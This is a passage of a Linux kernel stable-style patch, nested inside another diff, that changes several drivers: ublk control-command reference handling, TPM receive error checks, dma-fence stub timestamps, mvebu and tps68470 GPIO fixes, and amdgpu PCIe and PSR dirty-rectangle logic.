+@@ -1615,17 +1610,12 @@ static int ublk_ctrl_get_queue_affinity(struct io_uring_cmd *cmd)
+ 	if (!header->addr)
+ 		return -EINVAL;
+ 
+-	ub = ublk_get_device_from_id(header->dev_id);
+-	if (!ub)
+-		return -EINVAL;
+-
+ 	queue = header->data[0];
+ 	if (queue >= ub->dev_info.nr_hw_queues)
+-		goto out_put_device;
++		return -EINVAL;
+ 
+-	ret = -ENOMEM;
+ 	if (!zalloc_cpumask_var(&cpumask, GFP_KERNEL))
+-		goto out_put_device;
++		return -ENOMEM;
+ 
+ 	for_each_possible_cpu(i) {
+ 		if (ub->tag_set.map[HCTX_TYPE_DEFAULT].mq_map[i] == queue)
+@@ -1643,8 +1633,6 @@ static int ublk_ctrl_get_queue_affinity(struct io_uring_cmd *cmd)
+ 	ret = 0;
+ out_free_cpumask:
+ 	free_cpumask_var(cpumask);
+-out_put_device:
+-	ublk_put_device(ub);
+ 	return ret;
+ }
+ 
+@@ -1765,30 +1753,27 @@ static inline bool ublk_idr_freed(int id)
+ 	return ptr == NULL;
+ }
+ 
+-static int ublk_ctrl_del_dev(int idx)
++static int ublk_ctrl_del_dev(struct ublk_device **p_ub)
+ {
+-	struct ublk_device *ub;
++	struct ublk_device *ub = *p_ub;
++	int idx = ub->ub_number;
+ 	int ret;
+ 
+ 	ret = mutex_lock_killable(&ublk_ctl_mutex);
+ 	if (ret)
+ 		return ret;
+ 
+-	ub = ublk_get_device_from_id(idx);
+-	if (ub) {
+-		ublk_remove(ub);
+-		ublk_put_device(ub);
+-		ret = 0;
+-	} else {
+-		ret = -ENODEV;
+-	}
++	ublk_remove(ub);
++
++	/* Mark the reference as consumed */
++	*p_ub = NULL;
++	ublk_put_device(ub);
+ 
+ 	/*
+ 	 * Wait until the idr is removed, then it can be reused after
+ 	 * DEL_DEV command is returned.
+ 	 */
+-	if (!ret)
+-		wait_event(ublk_idr_wq, ublk_idr_freed(idx));
++	wait_event(ublk_idr_wq, ublk_idr_freed(idx));
+ 	mutex_unlock(&ublk_ctl_mutex);
+ 
+ 	return ret;
+@@ -1803,50 +1788,36 @@ static inline void ublk_ctrl_cmd_dump(struct io_uring_cmd *cmd)
+ 			header->data[0], header->addr, header->len);
+ }
+ 
+-static int ublk_ctrl_stop_dev(struct io_uring_cmd *cmd)
++static int ublk_ctrl_stop_dev(struct ublk_device *ub)
+ {
+-	struct ublksrv_ctrl_cmd *header = (struct ublksrv_ctrl_cmd *)cmd->cmd;
+-	struct ublk_device *ub;
+-
+-	ub = ublk_get_device_from_id(header->dev_id);
+-	if (!ub)
+-		return -EINVAL;
+-
+ 	ublk_stop_dev(ub);
+ 	cancel_work_sync(&ub->stop_work);
+ 	cancel_work_sync(&ub->quiesce_work);
+ 
+-	ublk_put_device(ub);
+ 	return 0;
+ }
+ 
+-static int ublk_ctrl_get_dev_info(struct io_uring_cmd *cmd)
++static int ublk_ctrl_get_dev_info(struct ublk_device *ub,
++		struct io_uring_cmd *cmd)
+ {
+ 	struct ublksrv_ctrl_cmd *header = (struct ublksrv_ctrl_cmd *)cmd->cmd;
+ 	void __user *argp = (void __user *)(unsigned long)header->addr;
+-	struct ublk_device *ub;
+-	int ret = 0;
+ 
+ 	if (header->len < sizeof(struct ublksrv_ctrl_dev_info) || !header->addr)
+ 		return -EINVAL;
+ 
+-	ub = ublk_get_device_from_id(header->dev_id);
+-	if (!ub)
+-		return -EINVAL;
+-
+ 	if (copy_to_user(argp, &ub->dev_info, sizeof(ub->dev_info)))
+-		ret = -EFAULT;
+-	ublk_put_device(ub);
++		return -EFAULT;
+ 
+-	return ret;
++	return 0;
+ }
+ 
+-static int ublk_ctrl_get_params(struct io_uring_cmd *cmd)
++static int ublk_ctrl_get_params(struct ublk_device *ub,
++		struct io_uring_cmd *cmd)
+ {
+ 	struct ublksrv_ctrl_cmd *header = (struct ublksrv_ctrl_cmd *)cmd->cmd;
+ 	void __user *argp = (void __user *)(unsigned long)header->addr;
+ 	struct ublk_params_header ph;
+-	struct ublk_device *ub;
+ 	int ret;
+ 
+ 	if (header->len <= sizeof(ph) || !header->addr)
+@@ -1861,10 +1832,6 @@ static int ublk_ctrl_get_params(struct io_uring_cmd *cmd)
+ 	if (ph.len > sizeof(struct ublk_params))
+ 		ph.len = sizeof(struct ublk_params);
+ 
+-	ub = ublk_get_device_from_id(header->dev_id);
+-	if (!ub)
+-		return -EINVAL;
+-
+ 	mutex_lock(&ub->mutex);
+ 	if (copy_to_user(argp, &ub->params, ph.len))
+ 		ret = -EFAULT;
+@@ -1872,16 +1839,15 @@ static int ublk_ctrl_get_params(struct io_uring_cmd *cmd)
+ 		ret = 0;
+ 	mutex_unlock(&ub->mutex);
+ 
+-	ublk_put_device(ub);
+ 	return ret;
+ }
+ 
+-static int ublk_ctrl_set_params(struct io_uring_cmd *cmd)
++static int ublk_ctrl_set_params(struct ublk_device *ub,
++		struct io_uring_cmd *cmd)
+ {
+ 	struct ublksrv_ctrl_cmd *header = (struct ublksrv_ctrl_cmd *)cmd->cmd;
+ 	void __user *argp = (void __user *)(unsigned long)header->addr;
+ 	struct ublk_params_header ph;
+-	struct ublk_device *ub;
+ 	int ret = -EFAULT;
+ 
+ 	if (header->len <= sizeof(ph) || !header->addr)
+@@ -1896,10 +1862,6 @@ static int ublk_ctrl_set_params(struct io_uring_cmd *cmd)
+ 	if (ph.len > sizeof(struct ublk_params))
+ 		ph.len = sizeof(struct ublk_params);
+ 
+-	ub = ublk_get_device_from_id(header->dev_id);
+-	if (!ub)
+-		return -EINVAL;
+-
+ 	/* parameters can only be changed when device isn't live */
+ 	mutex_lock(&ub->mutex);
+ 	if (ub->dev_info.state == UBLK_S_DEV_LIVE) {
+@@ -1914,7 +1876,6 @@ static int ublk_ctrl_set_params(struct io_uring_cmd *cmd)
+ 			ub->params.types = 0;
+ 	}
+ 	mutex_unlock(&ub->mutex);
+-	ublk_put_device(ub);
+ 
+ 	return ret;
+ }
+@@ -1941,17 +1902,13 @@ static void ublk_queue_reinit(struct ublk_device *ub, struct ublk_queue *ubq)
+ 	}
+ }
+ 
+-static int ublk_ctrl_start_recovery(struct io_uring_cmd *cmd)
++static int ublk_ctrl_start_recovery(struct ublk_device *ub,
++		struct io_uring_cmd *cmd)
+ {
+ 	struct ublksrv_ctrl_cmd *header = (struct ublksrv_ctrl_cmd *)cmd->cmd;
+-	struct ublk_device *ub;
+ 	int ret = -EINVAL;
+ 	int i;
+ 
+-	ub = ublk_get_device_from_id(header->dev_id);
+-	if (!ub)
+-		return ret;
+-
+ 	mutex_lock(&ub->mutex);
+ 	if (!ublk_can_use_recovery(ub))
+ 		goto out_unlock;
+@@ -1984,25 +1941,22 @@ static int ublk_ctrl_start_recovery(struct io_uring_cmd *cmd)
+ 	ret = 0;
+  out_unlock:
+ 	mutex_unlock(&ub->mutex);
+-	ublk_put_device(ub);
+ 	return ret;
+ }
+ 
+-static int ublk_ctrl_end_recovery(struct io_uring_cmd *cmd)
++static int ublk_ctrl_end_recovery(struct ublk_device *ub,
++		struct io_uring_cmd *cmd)
+ {
+ 	struct ublksrv_ctrl_cmd *header = (struct ublksrv_ctrl_cmd *)cmd->cmd;
+ 	int ublksrv_pid = (int)header->data[0];
+-	struct ublk_device *ub;
+ 	int ret = -EINVAL;
+ 
+-	ub = ublk_get_device_from_id(header->dev_id);
+-	if (!ub)
+-		return ret;
+-
+ 	pr_devel("%s: Waiting for new ubq_daemons(nr: %d) are ready, dev id %d...\n",
+ 			__func__, ub->dev_info.nr_hw_queues, header->dev_id);
+ 	/* wait until new ubq_daemon sending all FETCH_REQ */
+-	wait_for_completion_interruptible(&ub->completion);
++	if (wait_for_completion_interruptible(&ub->completion))
++		return -EINTR;
++
+ 	pr_devel("%s: All new ubq_daemons(nr: %d) are ready, dev id %d\n",
+ 			__func__, ub->dev_info.nr_hw_queues, header->dev_id);
+ 
+@@ -2026,7 +1980,6 @@ static int ublk_ctrl_end_recovery(struct io_uring_cmd *cmd)
+ 	ret = 0;
+  out_unlock:
+ 	mutex_unlock(&ub->mutex);
+-	ublk_put_device(ub);
+ 	return ret;
+ }
+ 
+@@ -2034,6 +1987,7 @@ static int ublk_ctrl_uring_cmd(struct io_uring_cmd *cmd,
+ 		unsigned int issue_flags)
+ {
+ 	struct ublksrv_ctrl_cmd *header = (struct ublksrv_ctrl_cmd *)cmd->cmd;
++	struct ublk_device *ub = NULL;
+ 	int ret = -EINVAL;
+ 
+ 	if (issue_flags & IO_URING_F_NONBLOCK)
+@@ -2048,41 +2002,50 @@ static int ublk_ctrl_uring_cmd(struct io_uring_cmd *cmd,
+ 	if (!capable(CAP_SYS_ADMIN))
+ 		goto out;
+ 
+-	ret = -ENODEV;
++	if (cmd->cmd_op != UBLK_CMD_ADD_DEV) {
++		ret = -ENODEV;
++		ub = ublk_get_device_from_id(header->dev_id);
++		if (!ub)
++			goto out;
++	}
++
+ 	switch (cmd->cmd_op) {
+ 	case UBLK_CMD_START_DEV:
+-		ret = ublk_ctrl_start_dev(cmd);
++		ret = ublk_ctrl_start_dev(ub, cmd);
+ 		break;
+ 	case UBLK_CMD_STOP_DEV:
+-		ret = ublk_ctrl_stop_dev(cmd);
++		ret = ublk_ctrl_stop_dev(ub);
+ 		break;
+ 	case UBLK_CMD_GET_DEV_INFO:
+-		ret = ublk_ctrl_get_dev_info(cmd);
++		ret = ublk_ctrl_get_dev_info(ub, cmd);
+ 		break;
+ 	case UBLK_CMD_ADD_DEV:
+ 		ret = ublk_ctrl_add_dev(cmd);
+ 		break;
+ 	case UBLK_CMD_DEL_DEV:
+-		ret = ublk_ctrl_del_dev(header->dev_id);
++		ret = ublk_ctrl_del_dev(&ub);
+ 		break;
+ 	case UBLK_CMD_GET_QUEUE_AFFINITY:
+-		ret = ublk_ctrl_get_queue_affinity(cmd);
++		ret = ublk_ctrl_get_queue_affinity(ub, cmd);
+ 		break;
+ 	case UBLK_CMD_GET_PARAMS:
+-		ret = ublk_ctrl_get_params(cmd);
++		ret = ublk_ctrl_get_params(ub, cmd);
+ 		break;
+ 	case UBLK_CMD_SET_PARAMS:
+-		ret = ublk_ctrl_set_params(cmd);
++		ret = ublk_ctrl_set_params(ub, cmd);
+ 		break;
+ 	case UBLK_CMD_START_USER_RECOVERY:
+-		ret = ublk_ctrl_start_recovery(cmd);
++		ret = ublk_ctrl_start_recovery(ub, cmd);
+ 		break;
+ 	case UBLK_CMD_END_USER_RECOVERY:
+-		ret = ublk_ctrl_end_recovery(cmd);
++		ret = ublk_ctrl_end_recovery(ub, cmd);
+ 		break;
+ 	default:
++		ret = -ENOTSUPP;
+ 		break;
+ 	}
++	if (ub)
++		ublk_put_device(ub);
+  out:
+ 	io_uring_cmd_done(cmd, ret, 0, issue_flags);
+ 	pr_devel("%s: cmd done ret %d cmd_op %x, dev id %d qid %d\n",
+diff --git a/drivers/char/tpm/tpm_tis_core.c b/drivers/char/tpm/tpm_tis_core.c
+index 55f6ff1e05aa5..44f71f2c8cfa0 100644
+--- a/drivers/char/tpm/tpm_tis_core.c
++++ b/drivers/char/tpm/tpm_tis_core.c
+@@ -356,8 +356,13 @@ static int tpm_tis_recv(struct tpm_chip *chip, u8 *buf, size_t count)
+ 		goto out;
+ 	}
+ 
+-	size += recv_data(chip, &buf[TPM_HEADER_SIZE],
+-			  expected - TPM_HEADER_SIZE);
++	rc = recv_data(chip, &buf[TPM_HEADER_SIZE],
++		       expected - TPM_HEADER_SIZE);
++	if (rc < 0) {
++		size = rc;
++		goto out;
++	}
++	size += rc;
+ 	if (size < expected) {
+ 		dev_err(&chip->dev, "Unable to read remainder of result\n");
+ 		size = -ETIME;
+diff --git a/drivers/cpufreq/intel_pstate.c b/drivers/cpufreq/intel_pstate.c
+index 818eb2503cdd5..d51f90f55c05c 100644
+--- a/drivers/cpufreq/intel_pstate.c
++++ b/drivers/cpufreq/intel_pstate.c
+@@ -451,20 +451,6 @@ static void intel_pstate_init_acpi_perf_limits(struct cpufreq_policy *policy)
+ 			 (u32) cpu->acpi_perf_data.states[i].control);
+ 	}
+ 
+-	/*
+-	 * The _PSS table doesn't contain whole turbo frequency range.
+-	 * This just contains +1 MHZ above the max non turbo frequency,
+-	 * with control value corresponding to max turbo ratio. But
+-	 * when cpufreq set policy is called, it will call with this
+-	 * max frequency, which will cause a reduced performance as
+-	 * this driver uses real max turbo frequency as the max
+-	 * frequency. So correct this frequency in _PSS table to
+-	 * correct max turbo frequency based on the turbo state.
+-	 * Also need to convert to MHz as _PSS freq is in MHz.
+-	 */
+-	if (!global.turbo_disabled)
+-		cpu->acpi_perf_data.states[0].core_frequency =
+-					policy->cpuinfo.max_freq / 1000;
+ 	cpu->valid_pss_table = true;
+ 	pr_debug("_PPC limits will be enforced\n");
+ 
+diff --git a/drivers/cxl/acpi.c b/drivers/cxl/acpi.c
+index fb649683dd3ac..07b184382707e 100644
+--- a/drivers/cxl/acpi.c
++++ b/drivers/cxl/acpi.c
+@@ -154,9 +154,8 @@ static int cxl_parse_cfmws(union acpi_subtable_headers *header, void *arg,
+ 	else
+ 		rc = cxl_decoder_autoremove(dev, cxld);
+ 	if (rc) {
+-		dev_err(dev, "Failed to add decode range [%#llx - %#llx]\n",
+-			cxld->hpa_range.start, cxld->hpa_range.end);
+-		return 0;
++		dev_err(dev, "Failed to add decode range: %pr", res);
++		return rc;
+ 	}
+ 	dev_dbg(dev, "add: %s node: %d range [%#llx - %#llx]\n",
+ 		dev_name(&cxld->dev),
+diff --git a/drivers/dma-buf/dma-fence-unwrap.c b/drivers/dma-buf/dma-fence-unwrap.c
+index 7002bca792ff0..c625bb2b5d563 100644
+--- a/drivers/dma-buf/dma-fence-unwrap.c
++++ b/drivers/dma-buf/dma-fence-unwrap.c
+@@ -66,18 +66,36 @@ struct dma_fence *__dma_fence_unwrap_merge(unsigned int num_fences,
+ {
+ 	struct dma_fence_array *result;
+ 	struct dma_fence *tmp, **array;
++	ktime_t timestamp;
+ 	unsigned int i;
+ 	size_t count;
+ 
+ 	count = 0;
++	timestamp = ns_to_ktime(0);
+ 	for (i = 0; i < num_fences; ++i) {
+-		dma_fence_unwrap_for_each(tmp, &iter[i], fences[i])
+-			if (!dma_fence_is_signaled(tmp))
++		dma_fence_unwrap_for_each(tmp, &iter[i], fences[i]) {
++			if (!dma_fence_is_signaled(tmp)) {
+ 				++count;
++			} else if (test_bit(DMA_FENCE_FLAG_TIMESTAMP_BIT,
++					    &tmp->flags)) {
++				if (ktime_after(tmp->timestamp, timestamp))
++					timestamp = tmp->timestamp;
++			} else {
++				/*
++				 * Use the current time if the fence is
++				 * currently signaling.
++				 */
++				timestamp = ktime_get();
++			}
++		}
+ 	}
+ 
++	/*
++	 * If we couldn't find a pending fence just return a private signaled
++	 * fence with the timestamp of the last signaled one.
++	 */
+ 	if (count == 0)
+-		return dma_fence_get_stub();
++		return dma_fence_allocate_private_stub(timestamp);
+ 
+ 	array = kmalloc_array(count, sizeof(*array), GFP_KERNEL);
+ 	if (!array)
+@@ -138,7 +156,7 @@ restart:
+ 	} while (tmp);
+ 
+ 	if (count == 0) {
+-		tmp = dma_fence_get_stub();
++		tmp = dma_fence_allocate_private_stub(ktime_get());
+ 		goto return_tmp;
+ 	}
+ 
+diff --git a/drivers/dma-buf/dma-fence.c b/drivers/dma-buf/dma-fence.c
+index 0de0482cd36e2..eef4786aaf862 100644
+--- a/drivers/dma-buf/dma-fence.c
++++ b/drivers/dma-buf/dma-fence.c
+@@ -150,16 +150,17 @@ EXPORT_SYMBOL(dma_fence_get_stub);
+ 
+ /**
+  * dma_fence_allocate_private_stub - return a private, signaled fence
++ * @timestamp: timestamp when the fence was signaled
+  *
+  * Return a newly allocated and signaled stub fence.
+  */
+-struct dma_fence *dma_fence_allocate_private_stub(void)
++struct dma_fence *dma_fence_allocate_private_stub(ktime_t timestamp)
+ {
+ 	struct dma_fence *fence;
+ 
+ 	fence = kzalloc(sizeof(*fence), GFP_KERNEL);
+ 	if (fence == NULL)
+-		return ERR_PTR(-ENOMEM);
++		return NULL;
+ 
+ 	dma_fence_init(fence,
+ 		       &dma_fence_stub_ops,
+@@ -169,7 +170,7 @@ struct dma_fence *dma_fence_allocate_private_stub(void)
+ 	set_bit(DMA_FENCE_FLAG_ENABLE_SIGNAL_BIT,
+ 		&fence->flags);
+ 
+-	dma_fence_signal(fence);
++	dma_fence_signal_timestamp(fence, timestamp);
+ 
+ 	return fence;
+ }
+diff --git a/drivers/gpio/gpio-mvebu.c b/drivers/gpio/gpio-mvebu.c
+index 91a4232ee58c2..0ba9d04183a60 100644
+--- a/drivers/gpio/gpio-mvebu.c
++++ b/drivers/gpio/gpio-mvebu.c
+@@ -874,7 +874,7 @@ static int mvebu_pwm_probe(struct platform_device *pdev,
+ 
+ 	spin_lock_init(&mvpwm->lock);
+ 
+-	return pwmchip_add(&mvpwm->chip);
++	return devm_pwmchip_add(dev, &mvpwm->chip);
+ }
+ 
+ #ifdef CONFIG_DEBUG_FS
+@@ -1112,6 +1112,13 @@ static int mvebu_gpio_probe_syscon(struct platform_device *pdev,
+ 	return 0;
+ }
+ 
++static void mvebu_gpio_remove_irq_domain(void *data)
++{
++	struct irq_domain *domain = data;
++
++	irq_domain_remove(domain);
++}
++
+ static int mvebu_gpio_probe(struct platform_device *pdev)
+ {
+ 	struct mvebu_gpio_chip *mvchip;
+@@ -1243,17 +1250,21 @@ static int mvebu_gpio_probe(struct platform_device *pdev)
+ 	if (!mvchip->domain) {
+ 		dev_err(&pdev->dev, "couldn't allocate irq domain %s (DT).\n",
+ 			mvchip->chip.label);
+-		err = -ENODEV;
+-		goto err_pwm;
++		return -ENODEV;
+ 	}
+ 
++	err = devm_add_action_or_reset(&pdev->dev, mvebu_gpio_remove_irq_domain,
++				       mvchip->domain);
++	if (err)
++		return err;
++
+ 	err = irq_alloc_domain_generic_chips(
+ 	    mvchip->domain, ngpios, 2, np->name, handle_level_irq,
+ 	    IRQ_NOREQUEST | IRQ_NOPROBE | IRQ_LEVEL, 0, 0);
+ 	if (err) {
+ 		dev_err(&pdev->dev, "couldn't allocate irq chips %s (DT).\n",
+ 			mvchip->chip.label);
+-		goto err_domain;
++		return err;
+ 	}
+ 
+ 	/*
+@@ -1293,13 +1304,6 @@ static int mvebu_gpio_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	return 0;
+-
+-err_domain:
+-	irq_domain_remove(mvchip->domain);
+-err_pwm:
+-	pwmchip_remove(&mvchip->mvpwm->chip);
+-
+-	return err;
+ }
+ 
+ static struct platform_driver mvebu_gpio_driver = {
+diff --git a/drivers/gpio/gpio-tps68470.c b/drivers/gpio/gpio-tps68470.c
+index aaddcabe9b359..532deaddfd4e2 100644
+--- a/drivers/gpio/gpio-tps68470.c
++++ b/drivers/gpio/gpio-tps68470.c
+@@ -91,13 +91,13 @@ static int tps68470_gpio_output(struct gpio_chip *gc, unsigned int offset,
+ 	struct tps68470_gpio_data *tps68470_gpio = gpiochip_get_data(gc);
+ 	struct regmap *regmap = tps68470_gpio->tps68470_regmap;
+ 
++	/* Set the initial value */
++	tps68470_gpio_set(gc, offset, value);
++
+ 	/* rest are always outputs */
+ 	if (offset >= TPS68470_N_REGULAR_GPIO)
+ 		return 0;
+ 
+-	/* Set the initial value */
+-	tps68470_gpio_set(gc, offset, value);
+-
+ 	return regmap_update_bits(regmap, TPS68470_GPIO_CTL_REG_A(offset),
+ 				 TPS68470_GPIO_MODE_MASK,
+ 				 TPS68470_GPIO_MODE_OUT_CMOS);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu.h b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+index 39c5e14b02529..c0e782a95e72e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+@@ -1262,6 +1262,7 @@ int amdgpu_device_gpu_recover(struct amdgpu_device *adev,
+ void amdgpu_device_pci_config_reset(struct amdgpu_device *adev);
+ int amdgpu_device_pci_reset(struct amdgpu_device *adev);
+ bool amdgpu_device_need_post(struct amdgpu_device *adev);
++bool amdgpu_device_pcie_dynamic_switching_supported(void);
+ bool amdgpu_device_should_use_aspm(struct amdgpu_device *adev);
+ bool amdgpu_device_aspm_support_quirk(void);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index ef0a94c70859b..30c97ee375636 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -1333,6 +1333,25 @@ bool amdgpu_device_need_post(struct amdgpu_device *adev)
+ 	return true;
+ }
+ 
++/*
++ * Intel hosts such as Raptor Lake and Sapphire Rapids don't support dynamic
++ * speed switching. Until we have confirmation from Intel that a specific host
++ * supports it, it's safer that we keep it disabled for all.
++ *
++ * https://edc.intel.com/content/www/us/en/design/products/platforms/details/raptor-lake-s/13th-generation-core-processors-datasheet-volume-1-of-2/005/pci-express-support/
++ * https://gitlab.freedesktop.org/drm/amd/-/issues/2663
++ */
++bool amdgpu_device_pcie_dynamic_switching_supported(void)
++{
++#if IS_ENABLED(CONFIG_X86)
++	struct cpuinfo_x86 *c = &cpu_data(0);
++
++	if (c->x86_vendor == X86_VENDOR_INTEL)
++		return false;
++#endif
++	return true;
++}
++
+ /**
+  * amdgpu_device_should_use_aspm - check if the device should program ASPM
+  *
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+index 0af9fb4098e8a..eecbd8eeb1f5a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+@@ -472,11 +472,11 @@ static int psp_sw_init(void *handle)
+ 	return 0;
+ 
+ failed2:
+-	amdgpu_bo_free_kernel(&psp->fw_pri_bo,
+-			      &psp->fw_pri_mc_addr, &psp->fw_pri_buf);
+-failed1:
+ 	amdgpu_bo_free_kernel(&psp->fence_buf_bo,
+ 			      &psp->fence_buf_mc_addr, &psp->fence_buf);
++failed1:
++	amdgpu_bo_free_kernel(&psp->fw_pri_bo,
++			      &psp->fw_pri_mc_addr, &psp->fw_pri_buf);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index ce5df7927c21f..9b2915764306b 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -4948,6 +4948,30 @@ static int fill_dc_plane_attributes(struct amdgpu_device *adev,
+ 	return 0;
+ }
+ 
++static inline void fill_dc_dirty_rect(struct drm_plane *plane,
++				      struct rect *dirty_rect, int32_t x,
++				      int32_t y, int32_t width, int32_t height,
++				      int *i, bool ffu)
++{
++	WARN_ON(*i >= DC_MAX_DIRTY_RECTS);
++
++	dirty_rect->x = x;
++	dirty_rect->y = y;
++	dirty_rect->width = width;
++	dirty_rect->height = height;
++
++	if (ffu)
++		drm_dbg(plane->dev,
++			"[PLANE:%d] PSR FFU dirty rect size (%d, %d)\n",
++			plane->base.id, width, height);
++	else
++		drm_dbg(plane->dev,
++			"[PLANE:%d] PSR SU dirty rect at (%d, %d) size (%d, %d)",
++			plane->base.id, x, y, width, height);
++
++	(*i)++;
++}
++
+ /**
+  * fill_dc_dirty_rects() - Fill DC dirty regions for PSR selective updates
+  *
+@@ -4968,10 +4992,6 @@ static int fill_dc_plane_attributes(struct amdgpu_device *adev,
+  * addition, certain use cases - such as cursor and multi-plane overlay (MPO) -
+  * implicitly provide damage clips without any client support via the plane
+  * bounds.
+- *
+- * Today, amdgpu_dm only supports the MPO and cursor usecase.
+- *
+- * TODO: Also enable for FB_DAMAGE_CLIPS
+  */
+ static void fill_dc_dirty_rects(struct drm_plane *plane,
+ 				struct drm_plane_state *old_plane_state,
+@@ -4982,12 +5002,11 @@ static void fill_dc_dirty_rects(struct drm_plane *plane,
+ 	struct dm_crtc_state *dm_crtc_state = to_dm_crtc_state(crtc_state);
+ 	struct rect *dirty_rects = flip_addrs->dirty_rects;
+ 	uint32_t num_clips;
++	struct drm_mode_rect *clips;
+ 	bool bb_changed;
+ 	bool fb_changed;
+ 	u32 i = 0;
+ 
+-	flip_addrs->dirty_rect_count = 0;
+-
+ 	/*
+ 	 * Cursor plane has it's own dirty rect update interface. See
+ 	 * dcn10_dmub_update_cursor_data and dmub_cmd_update_cursor_info_data
+@@ -4995,20 +5014,20 @@ static void fill_dc_dirty_rects(struct drm_plane *plane,
+ 	if (plane->type == DRM_PLANE_TYPE_CURSOR)
+ 		return;
+ 
+-	/*
+-	 * Today, we only consider MPO use-case for PSR SU. If MPO not
+-	 * requested, and there is a plane update, do FFU.
+-	 */
++	num_clips = drm_plane_get_damage_clips_count(new_plane_state);
++	clips = drm_plane_get_damage_clips(new_plane_state);
++
+ 	if (!dm_crtc_state->mpo_requested) {
+-		dirty_rects[0].x = 0;
+-		dirty_rects[0].y = 0;
+-		dirty_rects[0].width = dm_crtc_state->base.mode.crtc_hdisplay;
+-		dirty_rects[0].height = dm_crtc_state->base.mode.crtc_vdisplay;
+-		flip_addrs->dirty_rect_count = 1;
+-		DRM_DEBUG_DRIVER("[PLANE:%d] PSR FFU dirty rect size (%d, %d)\n",
+-				 new_plane_state->plane->base.id,
+-				 dm_crtc_state->base.mode.crtc_hdisplay,
+-				 dm_crtc_state->base.mode.crtc_vdisplay);
++		if (!num_clips || num_clips > DC_MAX_DIRTY_RECTS)
++			goto ffu;
++
++		for (; flip_addrs->dirty_rect_count < num_clips; clips++)
++			fill_dc_dirty_rect(new_plane_state->plane,
++					   &dirty_rects[flip_addrs->dirty_rect_count],
++					   clips->x1, clips->y1,
++					   clips->x2 - clips->x1, clips->y2 - clips->y1,
++					   &flip_addrs->dirty_rect_count,
++					   false);
+ 		return;
+ 	}
+ 
+@@ -5019,7 +5038,6 @@ static void fill_dc_dirty_rects(struct drm_plane *plane,
+ 	 * If plane is moved or resized, also add old bounding box to dirty
+ 	 * rects.
+ 	 */
+-	num_clips = drm_plane_get_damage_clips_count(new_plane_state);
+ 	fb_changed = old_plane_state->fb->base.id !=
+ 		     new_plane_state->fb->base.id;
+ 	bb_changed = (old_plane_state->crtc_x != new_plane_state->crtc_x ||
+@@ -5027,36 +5045,51 @@ static void fill_dc_dirty_rects(struct drm_plane *plane,
+ 		      old_plane_state->crtc_w != new_plane_state->crtc_w ||
+ 		      old_plane_state->crtc_h != new_plane_state->crtc_h);
+ 
+-	DRM_DEBUG_DRIVER("[PLANE:%d] PSR bb_changed:%d fb_changed:%d num_clips:%d\n",
+-			 new_plane_state->plane->base.id,
+-			 bb_changed, fb_changed, num_clips);
++	drm_dbg(plane->dev,
++		"[PLANE:%d] PSR bb_changed:%d fb_changed:%d num_clips:%d\n",
++		new_plane_state->plane->base.id,
++		bb_changed, fb_changed, num_clips);
+ 
+-	if (num_clips || fb_changed || bb_changed) {
+-		dirty_rects[i].x = new_plane_state->crtc_x;
+-		dirty_rects[i].y = new_plane_state->crtc_y;
+-		dirty_rects[i].width = new_plane_state->crtc_w;
+-		dirty_rects[i].height = new_plane_state->crtc_h;
+-		DRM_DEBUG_DRIVER("[PLANE:%d] PSR SU dirty rect at (%d, %d) size (%d, %d)\n",
+-				 new_plane_state->plane->base.id,
+-				 dirty_rects[i].x, dirty_rects[i].y,
+-				 dirty_rects[i].width, dirty_rects[i].height);
+-		i += 1;
+-	}
++	if ((num_clips + (bb_changed ? 2 : 0)) > DC_MAX_DIRTY_RECTS)
++		goto ffu;
+ 
+-	/* Add old plane bounding-box if plane is moved or resized */
+ 	if (bb_changed) {
+-		dirty_rects[i].x = old_plane_state->crtc_x;
+-		dirty_rects[i].y = old_plane_state->crtc_y;
+-		dirty_rects[i].width = old_plane_state->crtc_w;
+-		dirty_rects[i].height = old_plane_state->crtc_h;
+-		DRM_DEBUG_DRIVER("[PLANE:%d] PSR SU dirty rect at (%d, %d) size (%d, %d)\n",
+-				old_plane_state->plane->base.id,
+-				dirty_rects[i].x, dirty_rects[i].y,
+-				dirty_rects[i].width, dirty_rects[i].height);
+-		i += 1;
++		fill_dc_dirty_rect(new_plane_state->plane, &dirty_rects[i],
++				   new_plane_state->crtc_x,
++				   new_plane_state->crtc_y,
++				   new_plane_state->crtc_w,
++				   new_plane_state->crtc_h, &i, false);
++
++		/* Add old plane bounding-box if plane is moved or resized */
++		fill_dc_dirty_rect(new_plane_state->plane, &dirty_rects[i],
++				   old_plane_state->crtc_x,
++				   old_plane_state->crtc_y,
++				   old_plane_state->crtc_w,
++				   old_plane_state->crtc_h, &i, false);
++	}
++
++	if (num_clips) {
++		for (; i < num_clips; clips++)
++			fill_dc_dirty_rect(new_plane_state->plane,
++					   &dirty_rects[i], clips->x1,
++					   clips->y1, clips->x2 - clips->x1,
++					   clips->y2 - clips->y1, &i, false);
++	} else if (fb_changed && !bb_changed) {
++		fill_dc_dirty_rect(new_plane_state->plane, &dirty_rects[i],
++				   new_plane_state->crtc_x,
++				   new_plane_state->crtc_y,
++				   new_plane_state->crtc_w,
++				   new_plane_state->crtc_h, &i, false);
+ 	}
+ 
+ 	flip_addrs->dirty_rect_count = i;
++	return;
++
++ffu:
++	fill_dc_dirty_rect(new_plane_state->plane, &dirty_rects[0], 0, 0,
++			   dm_crtc_state->base.mode.crtc_hdisplay,
++			   dm_crtc_state->base.mode.crtc_vdisplay,
++			   &flip_addrs->dirty_rect_count, true);
